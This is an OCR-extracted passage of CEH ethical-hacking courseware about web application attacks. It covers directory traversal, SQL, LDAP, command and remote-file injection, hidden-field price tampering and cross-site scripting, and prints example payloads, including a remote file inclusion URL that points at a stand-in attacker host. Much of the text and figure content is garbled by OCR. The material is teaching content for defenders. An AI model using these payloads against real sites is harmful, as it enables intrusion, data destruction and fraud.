h t t p : / / w w w . j u g g y b a n k . c o m / c u s t . a s p ? p r o f i l e = 2 1 & d e b i t = 2 5 0 0
Tampering with the URL parameters
h t t p : / / w w w . j u g g y b a n k . c o m / c u s t .a s p? p r o f i l e = 8 2 & d e b i t = 1 5 0 0
Other parameters can be

<
|G O |Q O
http://www.juggybank.com/stat. asp?pg=531&status=view
changed including attribute parameters
http://www.juggybank.com/stat.asp?pg=147&status=delete
FIGURE 13.6: Form Tampering
Module 13 Page 1760
D irecto ry T rav ersal
CEH
itkiul Nm Im
D ire c to ry T ra v e r s a l
___ When access is provided outside a defined application, there exists the possibility of unintended information disclosure or modification. Complex applications exist as application components and data, which are typically configured in multiple directories. An application has the ability to traverse these multiple directories to locate and execute the legitimate portions of an application. A directory traversal/forceful browsing attack occurs when the attacker is able to browse for directories and files outside the normal application access. A Directory Traversal/Forceful Browsing attack exposes the directory structure of an application, and often the underlying web server and operating system. With this level of access to the web application architecture, an attacker can: Enumerate the contents of files and directories Access pages that otherwise require authentication (and possibly payment) Gain secret knowledge of the application and its construction Discover user IDs and passwords buried in hidden files Locate source code and other interesting files left on the server View sensitive data, such as customer information
Module 13 Page 1761
The following example uses backup of the web application:
to backup several directories and obtain a file containing a
http://www.targetsite.com/../../../sitebackup.zip This example obtains the "/etc/passwd" file from a UNIX/Linux system, which contains user account information: http://www.targetsite.com/../../../../etc/passwd Let us consider another example where an attacker tries to access files located outside the web publishing directory using directory traversal: http://www.iuggybov.com/process.aspx=.J . / s o m e dir/some file http://www.iuggyboy.com/.././../../some dir/some file The pictorial representation of directory traversal attack is shown as follows:
/../../ /e tc /p a s s w d < ? p hp
$ th em e ' J a o o n . p h p ' ,
> c
password files
1 *
) )
Attacker
ro o t:a 9 8 b 2 4 a Id 3 e 8 :0 : l:S y s te m O p e ra to r: / :/b in /k s h d a e m o n : * : l: l: : / t m p : J a s o n :a 3 b 6 9 8 a 7 6 f7 6 d 5 7 .:1 8 2 :1 0 0 :D e v e lo p e r:/h o m e /u s e rs /J a s o n /:/b in /c s h
Vulnerable Server Code
FIGURE 13.7: Directory Traversal
Module 13 Page 1762
Security M isconfiguration
E as y E x p lo ita tio n
CEH
Using misconfiguration vulnerabilities, attackers gain unauthorized accesses to default accounts, read unused pages, exploit unpatched flaws, and read or write unprotected files and directories, etc.
C om m on P re v a le n c e
Security misconfiguration can occur at any level of an application stack, including the platform, web server, application server, framework, and custom code
E x a m p le
The application server admin console is automatically installed and not removed Default accounts are not changed Attacker discovers the standard admin pages on server, logs in with default passwords, and takes over
S e c u rity M is c o n fig u ra tio n
_ " Developers and network administrators should check that the entire stack is ' ___ configured properly or security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. For instance, if the server is not configured properly, then it results in various problems that can infect the security of a website. The problems that lead to such instances include server software flaws, unpatched security flaws, enabling unnecessary services, and improper authentication. A few of these problems can be detected easily with the help of automated scanners. Attackers can access default accounts, unused pages, unpatched flaws, unprotected files and directories, etc. to gain unauthorized access. All the unnecessary and unsafe features have to be taken care of and it proves very beneficial if they are completely disabled so that the outsiders don't make use of them for malicious attacks. All the application-based files have to be taken care of through proper authentication and strong security methods or crucial information can be leaked to the attackers. Examples of unnecessary features that should be disable or changed include: Q The application server admin console is automatically installed and not removed Default accounts are not changed
Module 13 Page 1763
Attacker discovers the standard admin pages on server, logs in with default passwords, and takes over
Module 13 Page 1764
In jectio n Flaw s
CEH
Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query Attackers exploit injection flaws by constructing malicious commands or queries that result in data loss or corruption, lack of accountability, or denial of access Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc. and can be easily discovered by application vulnerability scanners and fuzzers
S Q L In je c tio n
It involves the injection of malicious SQL queries into user input forms
C o m m a n d In je c tio n
It involves the injection of malicious code through a web application
L D A P In je c tio n
It involves the injection of malicious LDAP statements
SQL Server
In je c tio n F la w s
Injection flaws are the loopholes in the web application that allow unreliable data to be interpreted and executed as part of a command or query. The injection flaws are being exploited by the attacker by constructing malicious commands or queries that result in loss of data or corruption, lack of accountability, or denial of access. Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc. These flaws can be detected easily by application vulnerability scanners and fuzzers. By exploiting the flaws in the web application, the attacker can easily read, write, delete, and update any data, i.e., relevant or irrelevant to that particular application. They are many types of injection flaws; some of them are as follows:
SQL injection
SQL injection is the most common website vulnerability on the Internet. It is the technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database. In this, the attacker injects the malicious SQL queries into the user input form and this is usually performed to either to gain unauthorized access to a database or to retrieve information directly from the database.
* Command injection
The flaws in command injection are another type of web application vulnerability.
Module 13 Page 1765
These flaws are highly dangerous. In this type of attack, the attacker injects the malicious code via a web application.
LADP in jectio n
LDAP injection is an attack method in which the website that constructs the LDAP statements from user-supplied input are exploited for launching attacks. When an application fails to sanitize the user input, then the LDAP statement can be modified with the help of local proxy. This in turn results in the execution of arbitrary commands such as granting access to unauthorized queries and altering the content inside the LDAP tree.
Module 13 Page 1766
SQL In jectio n A ttacks

J SQL injection attacks use a series of malicious SQL queries to directly manipulate the database J J
CEH
SQ L in je c tio n a tta c k s
An attacker can use a vulnerable web application to bypass normal security measures and obtain direct access to the valuable data SQL injection attacks can often be executed from the address bar, from within application fields, and through queries and searches
Web Browser
...................
Internet
test');DROP TABLE Messages;-When this code is sent to the database server, it drops the Messages table
01 02 03 04 05 06 07 08 09 10 11
<?php function save email($user, $message) { $sql = "INSERT INTO Messages ( user, message ) VALUES ( '$user1, '$message' ) return mysql_query($sql); } ?>
SC*L Injection vulnerable server code
Code to insert spammy data on behalf of other users Attacker
test'), ('user2', '1 am Jason'), ('user3' , 'You are hacked

Note: For complete coverage of SQL Injection concepts and techniques, refer to Module 14: SQL Injection
SQL Injection Attacks

SQL injection attacks use command sequences from Structured Query Language (SQL) statements to control database data directly. Applications often use SQL statements to authenticate users to the application, validate roles and access levels, store and obtain information for the application and user, and link to other data sources. Using SQL injection methods, an attacker can use a vulnerable web application to avoid normal security measures and obtain direct access to valuable data. The reason why SQL injection attacks work is that the application does not properly validate input before passing it to a SQL statement. For example, the following SQL statement,
selec t
* from tablename injection attack:
where
User1D= 2302 becomes the following with a simple SQL
SELECT * FROM tablename WHERE UserID= 2302 OR 1=1 The expression "OR 1=1" evaluates to the value "TRUE," often allowing the enumeration of all user ID values from the database. SQL injection attacks can often be entered from the address bar, from within application fields, and through queries and searches. SQL injection attacks can allow an attacker to: Log in to the application without supplying valid credentials
Module 13 Page 1767
Perform queries against data in the database, often even data to which the application would not normally have access
Modify the database contents, or drop the database altogether Use the trust relationships established between the web application components to access other databases mi
Web Browser
A
test');DROP TABLE Messages;
When this code is sent to the database server, it drops the Messages table
01
<?php function save email(?user, ?message) < $sql = "INSERT INTO Messages ( user, message ) VALUES ( '?user', '?message' )"; return mysql query($sql); } ?>
SQL Injection vulnerable server code
Internet
02 03 04 05 06 07 08 09 10 11
Code to insert spammy data on behalf of other users
test'),
('user2',
'1 am Jason'),
Cuser3'
'You are hacked
FIGURE 13.8: SQL Injection Attacks
Module 13 Page 1768
Command Injection Attacks

J J
CEH
An attacker tries to craft an input string to gain shell access to a web server Shell Injection functions include and similar APIs
s y s te m (),s ta rtP ro c e s s (),
j a v a . l a n g . R u n t im e . e x e c ( ) , S y s t e m . D i a g n o s t i c s . P r o c e s s . S t a r t ( ) ,
This type of attack is used to deface websites virtually. Using this attack, an attacker adds an extra HTML-based content to the vulnerable web application In HTML embedding attacks, user input to a web script is placed into the output HTML, without being checked for HTML code or scripting
J
J
The attacker exploits this vulnerability and injects malicious code into system files
http://www.juggyboy.com/vulnerable.php?COLOR=http://evil/exploit?
Com mand Injection Attacks

Command injection flaws allow attackers to pass malicious code to different systems via a web application. The attacks include calls to the operating system over system calls, use of external programs over shell commands, and calls to the backend databases over SQL. Scripts that are written in Perl, Python, and other languages execute and insert the poorly designed web applications. If a web application uses any type of interpreter, attacks are inserted to inflict damage. To perform functions, web applications must use operating system features and external programs. Although many programs invoke externally, the frequently used program is Sendmail. When a piece of information is passed through the HTTP external request, it must be carefully scrubbed, or the attacker can insert special characters, malicious commands, and command modifiers into the information. The web application then blindly passes these characters to the external system for execution. Inserting SQL is dangerous and rather widespread, as it is in the form of command injection. Command injection attacks are easy to carry out and discover, but they are tough to understand.
^==3 Shell Injection

To complete various functionalities, web applications use various applications and programs. It is just like sending an email by using the UNIXsendmail program. There is a chance that an attacker may inject code into these programs. This kind of attack is dangerous
especially to web page security. These injections allow intruders to perform various types of malicious attacks against the user's server. An attacker tries to craft an input string to gain shell access to a web server. Shell injection functions include system (), Start Process (), java.lang.Runtime.exec (), System.Diagnostics.Process.Start (), and similar APIs.
H TM L Embedding
This type of attack is used to deface websites virtually. Using this attack, an attacker adds extra HTML-based content to the vulnerable web application. In HTML embedding attacks, user input to a web script is placed into the output HTML, without being checked for HTML code or scripting.
File Injection
a The attacker exploits this vulnerability and injects malicious code into system files: http://www.iuggvbov.com/vulnerable.php?COLOR=http://evil/exploit Users are allowed to upload various files on the server through various applications and those files can be accessed through the Internet from any part of the world. If the application ends with a php extensionand if any user requests it, then the application interprets it as a php script and executes it. This allows an attacker to perform arbitrary commands.
Module 13 Page 1770
Com m and Injection Exam ple

Attacker Launching Code Injection Attack Malicious code:
http://juggyboy/cgibin/lspro/lspro.cgi?hit_out=1036
www.juggyboy.cam/baimer.gifl|newpassword||1036 |60|468
Ju g g y B o y c o m
User Name Email Address
Addison a ddi@ juggyboy. c o ~
An attacker enters malicious code (account number) with a new password
Site URL ^ www.juggyboy.com Banner URL [ gif | |newpassword|1036|60|468
The last two sets of numbers are the banner size
Password [ newpassword
Once the attacker clicks the submit button, the password for the account 1036 is changed to "newpassword"
The server script assumes that only the URL of the banner image file is inserted into that field
Poor input validation at server script was exploited in this attack that uses database INSERT and UPDATE record command
Com mand Injection Exam ple

The following is an example of command injection: To perform a command injection attack, the attacker first enters malicious code (account number) with a new password. The last two sets of numbers are the banner size. Once the attacker clicks the submit button, the password for the account 1036 is changed to "newpassword." The server script assumes that only the URL of the banner image file is inserted into that field.
Module 13 Page 1771
Attacker Launching Code Injection Attack
M [ .................> I \
f h ttp //juggYbov/cgi bin/lspro/lspfo cgi ?hit out 1036
Malicious code:
w w w .^ u g g y b o y .c o m /b a n n e r .g ifl|n e w p a s s w o r d l|1 0 3 6 1601468
.com
UM f Name Addison
Email Address ^ addigojuggytooycom Sit URL [ w w w iuggyboycom

] ] !
1 nn#f URL [ .gif) |new pjssw ord|1036|fc0|468

Password [ ncwpjsswofd
Poor input validation at server script was exploited in this attack that uses database INSERT and UPDATE record command
FIGURE 13.9: Command Injection Example
Module 13 Page 1772
F ile I n je c tio n A tta c k

GO
< fo rm m e t h o d = " g e t "> n a m e = "D R IN K "> v a l u e = " p e p s i " > p e p s i< / o p tio n > v a l u e = " c o k e > c o k e < / o p t i o n > t y p e = " s u b m i t "> < s e le c t < o p t io n < o p t io n C in p u t < / fo rm > < ?p h p $ d r in k i f = 'c o k e ';
CEH
(is s e t (
$ _ G E T ['D R IN K ']
= . ' .p h p
$d dr rin k re q u u ii r re e ((
$ _G ET [ 'D R IN K '] ;
);
J $ d r in k
?>
< / s e le c t >
C lient code running in a brow ser
: ....
h t t p : / / w w w .ju g g y b o y .c o m / o rd e rs .p h p ? D R IN K = h ttp : / / j a s o n e v a l . c o m / e x p lo i t ? <
e
A ttacker
Attacker injects a rem otely hosted file at w w w .jasoneval.com containing an exploit
File injection attacks enable attackers to e xp lo it vulnerable scripts on the server to use a rem ote file instead o f a presumably trusted file fro m the local file system
F i le I n j e c t i o n A tta c k
Users are allowed to upload various files on the server through various applications and those files can be accessed through the Internet from anywhere in the world. If the application ends with a php extension and if any user requests it, then the application interprets it as a php script and executes it. This allows an attacker to perform arbitrary commands. File injection attacks enable attackers to exploit vulnerable scripts on the server to use a remote file instead of a presumably trusted file from the local file system. Consider the following client code running in a browser: <form method="get"> < s e le ct name="DRINK"> Coption value= "p ep si"> p ep si< /option> Coption value= "coke"> coke< /option> < /select> <input typ e= "subm it"> </forra>
Vulnerable PHP code

<?php $ d rin k = 'c o k e ';
Module 13 Page 1773
if
( i s s e t ( $ _ G E T ['D R IN K '] ) ) $ d rink = $_GET[ 'D RINK' ] ;
r e q u ir e ( $ d rink . ' .php' ?> To exploit the vulnerable
);
php
code,
the
attacker
injects
a remotely
hosted
file
at
www.jasoneval.com containing an exploit.
Exploit code
http://www.iuggvbov.com/orders. php?DRlNK=http://iasoneval.com/exploit?
Module 13 Page 1774
W h a t Is L D A P In je c tio n ?
I
CEH
(rtifwtf itfciul Nm Im
An LDAP in je c tio n te c h n iq u e is used to ta k e ad va n ta g e o f n o n -v a lid a te d w e b a p p lic a tio n in p u t v u ln e ra b ilitie s to pass LDAP filte r s used fo r se a rch in g D ire c to ry Services to o b ta in d ire c t access to d a taba ses b e h in d an LDAP tre e
(* W J Q J V) p H
a.
LDAP Directory Services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries
Filter Syntax Operator

=
(a t tr ib u te N a m e
o p e ra to r
v a lu e )
Example
(a b je c t c la s s = u s e r )
>=
(m d b S t o r a g e Q u o t a > = l 0 0 0 0 0 )
<=
(m d b S t o r a g e Q u o t a < = l 0 0 0 0 0 )
~= LDAP is based on the client-server model and clients can search the directory entries using filters * AND
( d i s p 1 a yN a m e ~ =F o e c k e 1 e r )
(0 A
( d is p la y N a m e * J o h n * )
(& )
(& ( o b j e c t c l a s s - u s e r ) (d is p la y N a m e Jo h n )
OR ( |) N O T(!)
( | ( o b j e c t c l a s s = u s e r ) ( d is p la y N a m e = J o h n )
( f o b je c tC la s s = g r o u p )
Copyright by E & C o i n a l .All Rights Reserved. Reproduction is Strictly Prohibited.
W h a t is L D A P I n j e c t i o n ?
An LDAP (Lightweight Directory Access Protocol) injection attack works in the same way as a SQL injection attack. All the inputs to the LDAP must be properly filtered, otherwise vulnerabilities in LDAP allow executing unauthorized queries or modification of the contents. LDAP attacks exploit web-based applications constructed based on LDAP statements by using a local proxy. LDAP statements are modified when certain applications fail. These services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries. It is based on the client-server model and clients can search the directory entries using filters.
Module 13 Page 1775
Filter Syntax Operator
( a t t r ib u t e N a m e
o p e ra to r v a lu e ) Example
( d i s p la y N a m e ~ = F o e c k e le r )
( d i s p la y N a m e = * J o h n * )
AND (&)
(S (o b je c tc la s s = u s e r )(d is p la y N a m e = Jo h n )
O R (|) N O T (I)
(&(o bjectdsss=user) (d splayN am e= John) (!objectClass=group)

FIGURE 13.10: LDAP Injection
Module 13 Page 1776
How LDAP Injection Works

*
Norm al Q uery Norm al Q uery + C ode Injection
C EH
Norm al R esult
LDAP
LDAP Server Client
Norm al R esult a n d / o r A dditional Inform ation
LDAP
LDAP Server
Client
LDAP injection attacks are similar to SQL injection attacks but exploit user parameters to generate LDAP query To test if an application is vulnerable to LDAP code injection, send a query to the server meaning that generates an invalid input. Ifthe LDAP server returns an error, it can be exploited with code injection techniques
Account Login
|
1Vv.\ Attacker
Username : Password
juggyboy)(&)) blah
Submit
If an attacker enters valid user name "juggyboy", and injects juggyboy)(&)) then the URL string becomes (&(USER=juggyboy)(&))(PASS=blah)) only the first filter is processed by the LDAP server, only the query (&(USER=juggyboy)(&)) is processed. This query is always true, and the attacker logs into the system without a valid password
H ow LD A P In je c tio n W o rk s
(H U LDAP injection attacks are commonly used on web applications. LDAP is applied to any of the applications that have some kind of user inputs used to generate the LDAP queries. To test if an application is vulnerable to LDAP code injection, send a query to the server that generates an invalid input. If the LDAP server returns an error, it can be exploited with code injection techniques. Depending upon the implementation of the target, one can try to achieve: Q Q Login Bypass Information Disclosure Privilege Escalation Information Alteration
Module 13 Page 1777
Normal operation
Norm al Q uery
Norm al Result
Client
FIGURE 13.11: Normal operation
LDAP Server
Operation with code injection
Norm al Q uery + Code Injection
<
N orm al Result and/or Additional Inform ation
c LDAP
LDAP Server
Client
FIGURE 13.12: Operation with code injection
Attack
If an attacker enters a valid user name of juggyboy" and injects juggyboy) ( &) ) , then the URL string becomes (& ( u s e r =juggyboy) (&)) (PA SS= blah)). Only the first filter is processed by the LDAP server; only the query (& (USER= juggyboy) (&)) is processed. This query is always true, and the attacker logs into the system without a valid password.
A c c o u n t Login
Usernam e : Password Attacker
juggyboy)(&))
blah
FIGURE 13.13: Attack
Module 13 Page 1778
Ethical Hacking and Countermeasures
Hidden Field Manipulation Attack I C E H

HTML Code
< fo m m e th o d = "p o s t" ty p e = "h id d e n " n am e=
Normal Request
h ttp :/ / w w w .ju g g y b o y .com /page.a sp x ?p r o d u c t= Ju g g y b o y % 2 OS h ir t & p r i c e = 2 0 0 .0 0 h t t p : / /w w w . ju g g y b o y .com /page.a sp x ?p r o d u o t= Ju g g y b o y % 2 0 S h ir t& p r ic e = 2 .
a c tio n ^ "p a g e .a s p x "> <i n p u t " P R IC E " v a l u e 2 0 0 . 0 0 " >" < in p u t ty p e = S h ir t "X b r> v a lu e =
Attack Request
P r o d u c t nam e:
" t e x t n a m e = "p ro d u c t" v a l u e = "Ju g g y b o y P ro d u ct p r ic e : < in p u t < / fo rm > s u b m it >

2 00 .00"X b r>
ty p e = " s u b m it"
0 0
When a user makes selections on an HTML page, the selection is typically stored as form field values and sent to the application as an HTTP request (GET or POST) HTML can also store field values as hidden fields, which are not rendered to the screen by the browser, but are collected and submitted as parameters during form submissions Attackers can examine the HTML code of the page and change the hidden field values in order to change post requests to server
Product Name Product Price
Juggyboy Shirt ^
0
[ 200
)
Submit 6
Copyrigh t b y
E&C01nal. A ll Rights R eserve d. R eproduction is Strictly Prohibited.
H i d d e n F i e l d M a n i p u l a t i o n A tta c k
Hidden manipulation attacks are mostly used against ecommerce websites today. Many online stores face these problems. In every client session, developers use hidden fields to store client information, including price of the product (Including discount rates). At the time of development of these such programs, developers feel that all the applications developed by them are safe, but a hacker can manipulate the prices of the product and complete a transaction with price that he or she has altered, rather than the actual price of the product. For example: On eBay, a particular mobile phone is for sale for $1000 and the hacker, by altering the price, gets it for only $10. This is a huge loss for website owners. To protect their networks from attacks, website owners are using the latest antivirus software, firewalls, intrusion detection systems, etc. If their website is attacked, often it also loses its credibility in the market. W hen any target requests web services and makes choices on the HTML page, then the choices are saved as form field values and delivered to the requested application as an HTTP request (GET or POST). The HTML pages generally save field values as hidden fields and they are not displayed on the monitor of the target but saved and placed in the form of strings or parameters at the time of form submission. Attackers can examine the HTML code of the page and change the hidden field values in order to change post requests to the server. <input type=hidden" name= "P R IC E " value= "200. 00>
Module 13 Page 1779 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Product name: <input type= " t e x t " name="product" value= "Juggyboy S h ir t "x b r > Product p r ic e : 200. 00"><br>
<input type= "subm it" value= 1 'submit"> </form> 1. 2. 3. 4. 5. Open the html page within an HTML editor. Locate the hidden field (e.g., "<type=hidden name=price value=200.00>"). Modify its content to a different value (e.g. "<type=hidden name=price value=2.00>"). Save the html file locally and browse it. Click the Buy button to perform electronic shoplifting via hidden manipulation.
HTM L Code
< fo rm m e th o d = "p o s t" t y p e = " 1 1 id d e n " nam e: < in p u t nam e= ty p e =
Norm al Request h t t p : / /www. ju g g y b o y . com /p age. a s p x ? p r o d u c t= Ju g g y b o y %2OS h ir t f ip r i c e = 2 0 0 .00
Hidden Field Price = 200.00 Attack Request h t t p :/ / www. ju g g y b o y . com /page. a s p x ? p r o d u c t= Ju g g yb o y% 2 0 S h i r t & p r i c e = 2 .00
;nt . i nns"pag . aspx">

< in p u t P ro d u ct "te x t" P ro d u ct < in p u t < / f o r : > " P R IC E " v a l u e = " 2 0 0 . 0 0 ">
n a m e = "p ro d u c t" S h ir t X b r > v a lu e = p r ic e :

2 0 0 . 0 0 "> < b r>
v a lu e = "Ju g g y b o y
ty p e = "s u b m it"
" s u b n ' . i t ,,>
1 ! "
FIGURE 13.14: Hidden Field Manipulation Attack
Module 13 Page 1780
C ross-site s c rip tin g (,XSS' or'CSS') attacks e x p lo it v u ln e ra b ilitie s in d y n a m ic a lly g e n e ra te d w e b pages, w hich enables m a licio u s attackers to in je c t c lie n t-s id e s c rip t in to w eb pages vie w e d by o th e r users It occurs w h e n in v a lid a te d in p u t d a ta is in clu d e d in d yn a m ic c o n te n t th a t is sen t to a user's w e b b ro w se r f o r re n d e rin g A ttackers in je c t m a lic io u s JavaScript, VBScript, A ctiveX, HTML, o r Flash fo r e xe cution on a v ic tim 's system by h id in g it w ith in le g itim a te re quests
Malicious script execution
Session hijacking
Redirecting to a malicious server
Brute force password cracking
privilegesuserExploitingI
Data theft
^ ^
Ads in hidden !FRAMES and pop-ups
Intranet probing
'1
manipulation
Data
Keylogging ^ and remote monitoring
Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited
C r o s s - S ite S c r i p t i n g (XSS) A t ta c k s
Cross-site scripting is also called XSS. Vulnerabilities occur when an attacker uses web applications and sends malicious code in JavaScript to different end users. It occurs when invalidated input data is included in dynamic content that is sent to a user's web browser for rendering. W hen a web application uses input from a user, an attacker can commence an attack using that input, which can propagate to other users as well. Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests. The end user may trust the web application, and the attacker can exploit that trust in order to do things that would not be allowed under normal conditions. An attacker often uses different methods to encode the malicious portion (Unicode) of the tag, so that a request seems genuine to the user. Some of them are: Q Q Malicious script execution - Session hijacking Brute force password cracking - Redirecting to a malicious server Exploiting user privileges - Data theft Intranet probing - Ads in hidden !FRAMES and pop-ups Data manipulation - Keylogging and remote monitoring
Module 13 Page 1781
H o w X SS A tta c k s W o rk
Normal Request
CEH
This example uses a rable page which handles for a nonexistent pages, a classic 404 error page
(Handles requests for a nonexistent page, a classic 404 error page)
Server
h t t p : / / j u g g y b o y . c o m / < s c r i p t > a l e r t ( "W A R N IN G : T h e a p p l i c a t i o n has e n c o u n te re d an e r r o r < ;) / s c r ip t>
How XSS A ttacks W ork

To understand how cross-site scripting is typically exploited, consider the following
hypothetical example.
Normal Request
h t t p : / / ju g g y b o y .c o m / a s o n _ f i l . h t m l
404 Not found / j a s o n _ f i l e . h tm l

Server Response
<hfcml>
< body> <? php "N o t fo u n d : " p r in t
Server Code
(Handles requests for a nonexistent page, a

c la s tic 4 0 A e rro r p a g e )
XSS Attack Code
u r ld e a o d e ($ _ S E R V E R [" R E Q U E S T _ U R I" ] ) ;
?>
Server Response
< /body> < / h tm l>
n
Server
h ttp :/ / ju g g y b o y .c o a a / < 3c r ip t > a l e r t (" W A R N IN G : The a p p l i c a t i o n has n c o u n t r* d a n rx ro r" ) ; < / s c r i p t >
FIGURE 13.15: How XSS Attacks Work
Module 13 Page 1782

Cross-Site Scripting Attack Scenario: Attack via Email

Hi, You have won a lott e ry of $ 2 M, d ick th e linkto claim it.
<A
C EH
User clicks the malicious link
S en d s em ail w ith
m a lic io u s link
HR EF=httD;//juggybQ y. co m / ....
M alicious c o d e is ex e c u te d o n t h e client w eb b ro w se r
Name: Shaun Age: 31 Location: UK ^ Occupation: SE Last visH: Sept 21,2010
<...............
S erv er s e n d s a p a g e to t h e u s e r w ith client profile
Attacker
In this example, the attacker crafts an email message with a malicious script and sends it to the victim: <A HREF=h t t p : / / l e g i t i m a t e S i t e . c o m / r e g i s t r a t i o n . c g i ? c l i e n t p r o f i l e = < S C R I P T > m a l ic io u s c o d e c / S C R I P T C l i c k here</A> When the user clicks on the link, the URL is sent to legitimateSite.com with the malicious code The legitimate server sends a page back to the user including the value of c l i e n t p r o f i l e , and the malicious code is executed on the client machine
Copyright by EtCmncil. All Rights Reserved. Reproduction is Strictly Prohibited
C r o s s - S ite S c r i p t i n g A tt a c k S c e n a r io : A tt a c k v i a E m a i l
In a crosssite scripting attack via email, the attacker crafts an email that contains a link to malicious script and sends it to the victim. Malicious Script: <A HREF=h t t p : / / le g it im a t e S i t e . c o m / r e g is tr a tio n . c g i? c lie n tp r o file = < S C R IP T > m a lic io u s c o d e < / S C R IP T C lic k here</A> W hen the user clicks on the link, the URL is sent to legitimateSite.com with the malicious code. Then the server sends a page back to the user including the value of client profile and the malicious code is executed on the client's machine. The following diagram depicts the cross-site scripting attack scenario attack via email:
Module 13 Page 1783
Ethical Hacking and Countermeasures Copyright by
EC-C0UnCil
Sends email with

malicious link
Request Is received by legitimate server
FIGURE 13.16: Attack via Email
Module 13 Page 1784
XSS Example: Attack via Em ail
CEH
rrr 1
U ser's B ro w s e r
M a lic io u s S crip t
A tta c k e r's S e rv e r
L e g itim a te S e rve r
<A H R E F= h t t p : / / j u g g y b o y b a n k . c a n /
a malicious link
r e g i s t r a t i o n . c x j i ? c l i e n t p r o f ile = < S C R I P T > m a lic io u s c o d e < / S C R IP T C lic k h ere< /A >
M i
the URL to user and convince user to click on it _ Request the page
o .................. !
Page with malicious script
Run
......
XSS E x a m p l e : A tta c k v i a E m a i l
The following are the steps involved in an XSS attack via email: 1. Construct a malicious link: <AHREF=h t t p : //ju g g y b o y b a n k .co m / re g istra tio n . c g i? c lie n tp r o file = < S C R IP T > m a lic io u s code</SCRIPT>>Click here</A> 2. 3. 4. 5. Email the URL to the user and convince the user to click on it. User requests the page. Legitimate server sends a response page with malicious script. Malicious script runs on the user's browser.
Module 13 Page 1785
IS
User's Browser Malicious Script Attackers Server Legitimate Server
< A H R E F = h t t p : / / ^ u g g y b o y b e in k . c o m /
Construct a malicious link
r e g i s t r a t i o n . c g i? c lie n t p r o f ile = < S C R IP T > m a lic io u s c o d e c / S C R IP T C lic k h e re < /A >
FIGURE 13.17: Attack via Email
Module 13 Page 1786
XSS Exam ple: Stealing Users' C ookies
C EH
U ser's B ro w s e r Host a page with malicious script
^^v kView i e w the page hostea hosted Dy by the attacker HTML containing malicious s c r i p t !
...................... .................. - !
Run Collect user's cookies Redirect to attacker's server < ........................ ( Send the request with the user's cookies
XSS E x a m p l e : S t e a l i n g U sers* C o o k i e s
To steal the user's cookies with the help of an XSS attack, the attacker looks for XSS vu nerabilities and then installs a cookie stealer (cookie logger). The following are the various steps involved in stealing user's cookies with the help of XSS attack: 1. Attacker initially hosts a page with malicious script 2. The user visits the page hosted by attacker 3. The attacker's server sends the response as HTML containing malicious script 4. The user's browser runs the HTML malicious script
5. The Cookie Logger present in the malicious script collects user's cookies 6. The malicious script redirects the user to attacker's server 7. The user's browser sends the request with the user's cookies
Module 13 Page 1787
a
1 I page w ith malicious script
Malicious Script
Attacker's Server
User's Browser
Attacker's
Server
*........... ............ ................................... I

! -,View the !<
page hosted by the attacker
I
Run
HTML containing malicious scrip t
........ >
Collect users cookies
Redirect to attacker's server1
!<.........
I Send th e request with the user's cookies
....d ' i
&
FIGURE 13.18: Stealing Users' Cookies
Module 13 Page 1788
XSS Example: Sending an Unauthorized Request
CEH
U ser's B ro w s e r Construct a malicious link
Email the URL td user and convince user to click on it
.........*
Request the page
II
Page with malicious script An authorized request
Run
XSS E x a m p l e : S e n d in g a n U n a u t h o r i z e d R e q u e s t
Using an XSS attack, the attacker can also send an unauthorized request. The following are the steps involved in an XSS attack intended to send an unauthorized request: 1. Attacker constructs a malicious link 2. Sends an email containing the URL to user and convinces user to click on it
3. The user's browser sends a request to the attacker's server for the page 4. The attacker's server in response to the user's request sends the page with malicious script 5. The user's browser runs the malicious script 6. The malicious script sends an authorized request
Module 13 Page 1789
FIGURE 13.19: Sending an Unauthorized Request
Module 13 Page 1790
XSS Attack in Blog Posting
CEH
4a
Malicious code <script>onload= window.location:
'h ttp ://w w w .ju g g Y b o y.co m '

</script> is injecting the blog post
User redirected to a malicious website juggyboy.com
Web Application
Malicious W ebsite
1 3 5 XSS A ttack in a Blog P o stin g

The following diagram depicts the XSS attack in a blog posting:
Malicious code
Attacker adds a malicious script in the com m ent field of blog post
<script>onload= window. location= 'http://w w w .juggybcy.com ' </script>

is injecting the blog post
Comment with malicious link is stored on the server

User redirected to a malicious website juggyboy.com
Database Server
Web Application
Malicious Website
FIGURE 13.20: XSS Attack in a Blog Posting

XSS Attack in Comment Field

oooo
I User visits the TechPost website
CEH
Facebook acquires file-sharing service New York-based start-up that lets users privately and spcxadicaty share fles through a drag-anddrop interface with additional options------
C om m ent
Jason, I love your blog post! -Made (mark@miccasoft.com)
Leave your com m ent
Malicious code
< s c r ip t a le r t (" H e ll o W or I d " ) </ s c r i p t>
is injecting th e blog post
H
H*ln World
Comment with malicious link is stored on the server Database Server W eb Application
The alert pops up as soon as the web page is loaded
I < * ......i
Pop up W indo w
J
....
XSS A tta c k in a C o m m e n t F i e l d
Many Internet web programs use HTML pages that dynamically accept data from
different sources. The data in the HTML pages can be dynamically changed according to the request. Attackers use the HTML web page's tags to manipulate the data and to launch the attack by changing the comments feature with a malicious script. When the target sees the comment and activates it, then the malicious script is executed on the target's browser, initiating malicious performances.
Module 13 Page 1792
aas
1 IcchP oM 1 ------- ---------- -
IM O M| n . Ort.TOlO Facebook acquires file-sharing service

N#w York baved start up that !tt users privately end sporadically share files through a drag and drop interface with Additional options.------
Attacker
Leave your com m ent Jason, 11ova your blog post! < s c rip t> a le rt(H e llo W o rld " ) < / s c r i p t >
Attacker adds a malicious script In the comment field of blog post
Malicious code
< s c rip t> a le r t("H e ll o W o r ld ")< / s c r ip t >
is injecting the blog post
Comment with malicious link is stored on the server
The alert pops up as soon as the web page Is loaded
Database Server
Web Application
Pop up Window
FIGURE 13.21: XSS Attack in a Comment Field
Module 13 Page 1793
X SS C h e a t S h e e t
